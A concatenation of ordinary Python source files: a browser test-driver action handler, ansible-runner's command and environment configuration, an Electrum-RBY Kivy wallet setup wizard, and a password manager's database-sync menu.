def process_action(self, url, payload):
parent = self.protocol.base.current_window
try:
self.protocol.base.set_window(self.test_window)
action = payload["action"]
self.logger.debug("Got action: %s" % action)
try:
action_handler = self.actions[action]
except KeyError:
raise ValueError("Unknown action %s" % action)
try:
action_handler(payload)
except Exception as e:
self.logger.warning("Action %s failed" % action)
self.logger.warning(traceback.format_exc())
self._send_message("complete", "failure")
else:
self.logger.debug("Action %s completed" % action)
self._send_message("complete", "success")
finally:
self.protocol.base.set_window(parent)
return False, None
def _send_message(self, message_type, status, message=None):
self.protocol.testdriver.send_message(message_type, status, message=message)
class ClickAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
elements = self.protocol.select.elements_by_selector(selector)
if len(elements) == 0:
raise ValueError("Selector matches no elements")
elif len(elements) > 1:
raise ValueError("Selector matches multiple elements")
self.logger.debug("Clicking element: %s" % selector)
self.protocol.click.element(elements[0])
class SendKeysAction(object):
def __init__(self, logger, protocol):
self.logger = logger
self.protocol = protocol
def __call__(self, payload):
selector = payload["selector"]
keys = payload["keys"]
elements = self.protocol.select.elements_by_selector(selector)
if len(elements) == 0:
raise ValueError("Selector matches no elements")
elif len(elements) > 1:
raise ValueError("Selector matches multiple elements")
self.logger.debug("Sending keys to element: %s" % selector)
self.protocol.send_keys.send_keys(elements[0], keys)
|
runner_config.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import re
import pipes
import threading
import pexpect
import stat
import shlex
from uuid import uuid4
from collections import Mapping
#from distutils.spawn import find_executable
from six import iteritems, string_types
from ansible_runner import output
from ansible_runner.exceptions import ConfigurationError
from ansible_runner.loader import ArtifactLoader
class RunnerConfig(object):
"""
A ``Runner`` configuration object that's meant to encapsulate the configuration used by the
:py:mod:`ansible_runner.runner.Runner` object to launch and manage the invocation of ``ansible``
and ``ansible-playbook``
Typically this object is initialized for you when using the standard ``run`` interfaces in :py:mod:`ansible_runner.interface`
but can be used to construct the ``Runner`` configuration to be invoked elsewhere. It can also be overridden to provide different
functionality to the Runner object.
:Example:
>>> rc = RunnerConfig(...)
>>> r = Runner(config=rc)
>>> r.run()
"""
def __init__(self,
private_data_dir=None, playbook=None, ident=uuid4(),
inventory=None, roles_path=None, limit=None, module=None, module_args=None,
verbosity=None, quiet=False, json_mode=False, artifact_dir=None,
rotate_artifacts=0, host_pattern=None, binary=None, extravars=None):
self.private_data_dir = os.path.abspath(private_data_dir)
self.ident = ident
self.json_mode = json_mode
self.playbook = playbook
self.inventory = inventory
self.roles_path = roles_path
self.limit = limit
self.module = module
self.module_args = module_args
self.host_pattern = host_pattern
self.binary = binary
self.rotate_artifacts = rotate_artifacts
self.artifact_dir = artifact_dir or self.private_data_dir
if self.ident is None:
self.artifact_dir = os.path.join(self.artifact_dir, "artifacts")
else:
self.artifact_dir = os.path.join(self.artifact_dir, "artifacts", "{}".format(self.ident))
self.extra_vars = extravars
self.verbosity = verbosity
self.quiet = quiet
self.loader = ArtifactLoader(self.private_data_dir)
def prepare(self):
"""
Performs basic checks and then properly invokes
- prepare_inventory
- prepare_env
- prepare_command
It's also responsible for wrapping the command with the proper ssh agent invocation
and setting early ANSIBLE_ environment variables.
"""
# ansible_path = find_executable('ansible')
# if ansible_path is None or not os.access(ansible_path, os.X_OK):
# raise ConfigurationError("Ansible not found. Make sure that it is installed.")
if self.private_data_dir is None:
raise ConfigurationError("Runner Base Directory is not defined")
if self.module is None and self.playbook is None: # TODO: ad-hoc mode, module and args
raise ConfigurationError("Runner playbook or module is not defined")
if self.module and self.playbook:
raise ConfigurationError("Only one of playbook and module options are allowed")
if not os.path.exists(self.artifact_dir):
os.makedirs(self.artifact_dir)
self.prepare_inventory()
self.prepare_env()
self.prepare_command()
# write the SSH key data into a fifo read by ssh-agent
if self.ssh_key_data:
self.ssh_key_path = os.path.join(self.artifact_dir, 'ssh_key_data')
self.open_fifo_write(self.ssh_key_path, self.ssh_key_data)
self.command = self.wrap_args_with_ssh_agent(self.command, self.ssh_key_path)
# Use local callback directory
callback_dir = os.getenv('AWX_LIB_DIRECTORY')
if callback_dir is None:
callback_dir = os.path.join(os.path.split(os.path.abspath(__file__))[0],
"callbacks")
python_path = os.getenv('PYTHONPATH', '')
if python_path:
python_path += ":"
self.env['ANSIBLE_CALLBACK_PLUGINS'] = callback_dir
if 'AD_HOC_COMMAND_ID' in self.env:
self.env['ANSIBLE_STDOUT_CALLBACK'] = 'minimal'
else:
self.env['ANSIBLE_STDOUT_CALLBACK'] = 'awx_display'
self.env['ANSIBLE_RETRY_FILES_ENABLED'] = 'False'
self.env['ANSIBLE_HOST_KEY_CHECKING'] = 'False'
self.env['AWX_ISOLATED_DATA_DIR'] = self.artifact_dir
self.env['PYTHONPATH'] = python_path + callback_dir + ':'
if self.roles_path:
self.env['ANSIBLE_ROLES_PATH'] = ':'.join(self.roles_path)
def prepare_inventory(self):
"""
Prepares the inventory default under ``private_data_dir`` if it's not overridden by the constructor.
"""
if self.inventory is None:
self.inventory = os.path.join(self.private_data_dir, "inventory")
def prepare_env(self):
"""
Manages reading environment metadata files under ``private_data_dir`` and merging/updating
with existing values so the :py:class:`ansible_runner.runner.Runner` object can read and use them easily
"""
try:
passwords = self.loader.load_file('env/passwords', Mapping)
self.expect_passwords = {
re.compile(pattern, re.M): password
for pattern, password in iteritems(passwords)
}
except ConfigurationError:
output.debug('Not loading passwords')
self.expect_passwords = dict()
self.expect_passwords[pexpect.TIMEOUT] = None
self.expect_passwords[pexpect.EOF] = None
try:
# seed env with existing shell env
self.env = os.environ.copy()
envvars = self.loader.load_file('env/envvars', Mapping)
if envvars:
self.env.update({k:str(v) for k, v in envvars.items()})
except ConfigurationError:
output.debug("Not loading environment vars")
# Still need to pass default environment to pexpect
self.env = os.environ.copy()
# extravars dict passed in via the interface API takes precedence over on-disk
if not self.extra_vars and self.loader.isfile('env/extravars'):
self.extra_vars = self.loader.abspath('env/extravars')
try:
self.settings = self.loader.load_file('env/settings', Mapping)
except ConfigurationError:
output.debug("Not loading settings")
self.settings = dict()
try:
self.ssh_key_data = self.loader.load_file('env/ssh_key', string_types)
except ConfigurationError:
output.debug("Not loading ssh key")
self.ssh_key_data = None
self.idle_timeout = self.settings.get('idle_timeout', None)
self.job_timeout = self.settings.get('job_timeout', None)
self.pexpect_timeout = self.settings.get('pexpect_timeout', 5)
self.pexpect_use_poll = self.settings.get('pexpect_use_poll', True)
self.suppress_ansible_output = self.settings.get('suppress_ansible_output', self.quiet)
if 'AD_HOC_COMMAND_ID' in self.env or not os.path.exists(os.path.join(self.private_data_dir, 'project')):
self.cwd = self.private_data_dir
else:
self.cwd = os.path.join(self.private_data_dir, 'project')
def prepare_command(self):
"""
Determines if the literal ``ansible`` or ``ansible-playbook`` commands are given
and if not calls :py:meth:`ansible_runner.runner_config.RunnerConfig.generate_ansible_command`
"""
try:
self.command = self.loader.load_file('args', string_types)
except ConfigurationError:
self.command = self.generate_ansible_command()
def generate_ansible_command(self):
"""
Given that the ``RunnerConfig`` preparation methods have been run to gather the inputs this method
will generate the ``ansible`` or ``ansible-playbook`` command that will be used by the
:py:class:`ansible_runner.runner.Runner` object to start the process
"""
if self.binary is not None:
base_command = self.binary
elif self.module is not None:
base_command = 'ansible'
else:
base_command = 'ansible-playbook'
exec_list = [base_command]
try:
cmdline_args = self.loader.load_file('env/cmdline', string_types)
args = shlex.split(cmdline_args.decode('utf-8'))
exec_list.extend(args)
except ConfigurationError:
pass
exec_list.append("-i")
exec_list.append(self.inventory)
if self.limit is not None:
exec_list.append("--limit")
exec_list.append(self.limit)
if isinstance(self.extra_vars, dict) and self.extra_vars:
exec_list.extend(
[
'-e',
'\'%s\'' % ' '.join(
["{}=\"{}\"".format(k, self.extra_vars[k]) for k in self.extra_vars]
)
]
)
elif self.extra_vars:
exec_list.extend(['-e', '@%s' % self.extra_vars])
if self.verbosity:
v = 'v' * self.verbosity
exec_list.append('-%s' % v)
# Other parameters
if base_command.endswith('ansible-playbook'):
exec_list.append(self.playbook)
elif base_command.endswith('ansible'):
exec_list.append("-m")
exec_list.append(self.module)
if self.module_args is not None:
exec_list.append("-a")
exec_list.append(self.module_args)
if self.host_pattern is not None:
exec_list.append(self.host_pattern)
return exec_list
def wrap_args_with_ssh_agent(self, args, ssh_key_path, ssh_auth_sock=None, silence_ssh_add=False):
"""
Given an existing command line and parameterization this will return the same command line wrapped with the
necessary calls to ``ssh-agent``
"""
if ssh_key_path:
ssh_add_command = self.args2cmdline('ssh-add', ssh_key_path)
if silence_ssh_add:
ssh_add_command = ' '.join([ssh_add_command, '2>/dev/null'])
cmd = ' && '.join([ssh_add_command,
self.args2cmdline('rm', '-f', ssh_key_path),
self.args2cmdline(*args)])
args = ['ssh-agent']
if ssh_auth_sock:
args.extend(['-a', ssh_auth_sock])
args.extend(['sh', '-c', cmd])
return args
def open_fifo_write(self, path, data):
# TODO: Switch to utility function
'''open_fifo_write opens the fifo named pipe in a new thread.
This blocks the thread until an external process (such as ssh-agent)
reads data from the pipe.
'''
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d),
args=(path, data)).start()
def args2cmdline(self, *args):
# TODO: switch to utility function
return ' '.join([pipes.quote(a) for a in args])
|
installwizard.py
|
from functools import partial
import threading
from kivy.app import App
from kivy.clock import Clock
from kivy.lang import Builder
from kivy.properties import ObjectProperty, StringProperty, OptionProperty
from kivy.core.window import Window
from kivy.uix.button import Button
from kivy.utils import platform
from kivy.uix.widget import Widget
from kivy.core.window import Window
from kivy.clock import Clock
from kivy.utils import platform
from electrum_rby.base_wizard import BaseWizard
from . import EventsDialog
from ...i18n import _
from .password_dialog import PasswordDialog
# global Variables
is_test = (platform == "linux")
test_seed = "time taxi field recycle tiny license olive virus report rare steel portion achieve"
test_xpub = "xpub661MyMwAqRbcEbvVtRRSjqxVnaWVUMewVzMiURAKyYratih4TtBpMypzzefmv8zUNebmNVzB3PojdC5sV2P9bDgMoo9B3SARw1MXUUfU1GL"
Builder.load_string('''
#:import Window kivy.core.window.Window
#:import _ electrum_rby_gui.kivy.i18n._
<WizardTextInput@TextInput>
border: 4, 4, 4, 4
font_size: '15sp'
padding: '15dp', '15dp'
background_color: (1, 1, 1, 1) if self.focus else (0.454, 0.698, 0.909, 1)
foreground_color: (0.31, 0.31, 0.31, 1) if self.focus else (0.835, 0.909, 0.972, 1)
hint_text_color: self.foreground_color
background_active: 'atlas://gui/kivy/theming/light/create_act_text_active'
background_normal: 'atlas://gui/kivy/theming/light/create_act_text_active'
size_hint_y: None
height: '48sp'
<WizardButton@Button>:
root: None
size_hint: 1, None
height: '48sp'
on_press: if self.root: self.root.dispatch('on_press', self)
on_release: if self.root: self.root.dispatch('on_release', self)
<BigLabel@Label>
color: .854, .925, .984, 1
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
bold: True
<-WizardDialog>
text_color: .854, .925, .984, 1
value: ''
#auto_dismiss: False
size_hint: None, None
canvas.before:
Color:
rgba: 0, 0, 0, .9
Rectangle:
size: Window.size
Color:
rgba: .239, .588, .882, 1
Rectangle:
size: Window.size
crcontent: crcontent
# add electrum icon
BoxLayout:
orientation: 'vertical' if self.width < self.height else 'horizontal'
padding:
min(dp(27), self.width/32), min(dp(27), self.height/32),\
min(dp(27), self.width/32), min(dp(27), self.height/32)
spacing: '10dp'
GridLayout:
id: grid_logo
cols: 1
pos_hint: {'center_y': .5}
size_hint: 1, None
height: self.minimum_height
Label:
color: root.text_color
text: 'ELECTRUM'
size_hint: 1, None
height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From %d cosigners')%n.value
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require %d signatures')%m.value
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum_rby.mnemonic import Mnemonic
from electrum_rby.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and last_word
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def password_dialog(self, message, callback):
popup = PasswordDialog()
popup.init(message, callback)
popup.open()
def request_password(self, run_next):
def callback(pin):
if pin:
self.run('confirm_password', pin, run_next)
else:
run_next(None, None)
self.password_dialog('Choose a PIN code', callback)
def confirm_password(self, pin, run_next):
def callback(conf):
if conf == pin:
run_next(pin, False)
else:
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
self.password_dialog('Confirm your PIN code', callback)
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
db_sync_screen.py
|
import pathlib
import threading
import subprocess
import json
from pw_manager.utils import utils, decorators, constants
from pw_manager.db_sync import db_sync
from pw_manager.db import Database
from YeetsMenu.menu import Menu, Option
from colorama import Style, Fore
from cryptography.fernet import InvalidToken
@decorators.require_valid_db()
@decorators.require_valid_sync_config()
def upload_current_db():
event = threading.Event()
try:
with open(utils.get_sync_file()) as f:
data: dict = json.load(f)
threading.Thread(target=utils.run_spinning_animation_till_event, args=["Uploading file...", event]).start()
db_sync.sync(db=constants.db_file,
action=db_sync.Options.UPLOAD,
server=data.get("server"),
username=data.get("username"),
password=data.get("password"),
path=data.get("path"))
finally:
event.set()
utils.clear_screen()
print(f"{Fore.GREEN}Successfully uploaded the database file!{Style.RESET_ALL}")
@decorators.require_valid_db()
@decorators.require_valid_sync_config()
def download_and_replace_current_db():
event = threading.Event()
try:
with open(utils.get_sync_file()) as f:
data: dict = json.load(f)
threading.Thread(target=utils.run_spinning_animation_till_event, args=["Downloading file...", event]).start()
db_sync.sync(db=constants.db_file,
action=db_sync.Options.DOWNLOAD,
server=data.get("server"),
username=data.get("username"),
password=data.get("password"),
path=data.get("path"))
finally:
event.set()
utils.clear_screen()
print(f"{Fore.GREEN}Successfully downloaded the database file!{Style.RESET_ALL}")
while True:
password = utils.ask_till_input_secret(f"{constants.colors[1]}Password for the database!\n > {constants.colors[0]}")
utils.reset_style()
try:
db: Database = Database(constants.db_file.path, password)
db.read()
constants.db_file = db
break
except InvalidToken:
print(f"{Fore.RED}Invalid password!{Style.RESET_ALL}")
try_again = utils.ask_till_input("Do you want to try again? y/n: ")
if try_again.lower() == "y":
continue
else:
break
print(f"{Fore.GREEN}Successfully selected the downloaded database!{Style.RESET_ALL}")
@decorators.catch_ctrl_c
def setup_sync():
utils.clear_screen()
utils.print_noice("Setup sync")
sync_file = pathlib.Path(utils.get_sync_file())
if sync_file.exists():
should_overwrite = utils.ask_till_input(f"{constants.colors[1]}Are you sure you want to overwrite and re-setup your sync settings? y/N\n > {constants.colors[0]}")
utils.reset_style()
if not should_overwrite.lower().strip() == "y":
print(f"{Fore.RED}Aborting overwrite!{Style.RESET_ALL}")
return
print(f"{Fore.GREEN}Overwriting...")
server = utils.ask_till_input(f"{constants.colors[1]}Please enter a server to sync your database with!\n > {constants.colors[0]}").strip()
event = threading.Event()
threading.Thread(target=utils.run_spinning_animation_till_event, args=["Running a quick ping to see if the server is reachable!", event]).start()
process = subprocess.Popen(f"ping -c 2 {server}".split(" "), stdout=subprocess.PIPE, stderr=subprocess.PIPE)
exit_code = process.wait(timeout=30)
event.set()
utils.clear_screen()
if exit_code != 0:
print(f"{Fore.RED}The server \"{server}\" could not be reached!{Style.RESET_ALL}")
return
print(f"{Fore.GREEN}Server could be reached!{Style.RESET_ALL}")
username = utils.ask_till_input(f"{constants.colors[1]}Please enter a username to that server!\n > {constants.colors[0]}").strip()
password = utils.ask_till_input_secret(f"{constants.colors[1]}Please enter the password to that username!\n > {constants.colors[0]}").strip()
event = threading.Event()
threading.Thread(target=utils.run_spinning_animation_till_event, args=["Checking if the credentials are working!", event]).start()
valid = db_sync.check_credentials(server, username, password)
event.set()
utils.clear_screen()
if not valid:
print(f"{Fore.RED}Credentials are not working!{Style.RESET_ALL}")
return
print(f"{Fore.GREEN}Credentials are working!{Style.RESET_ALL}")
path = utils.ask_till_input(f"{constants.colors[1]}Please enter the path of where the database should be stored on the server! (with the .db ending)\n > {constants.colors[0]}")
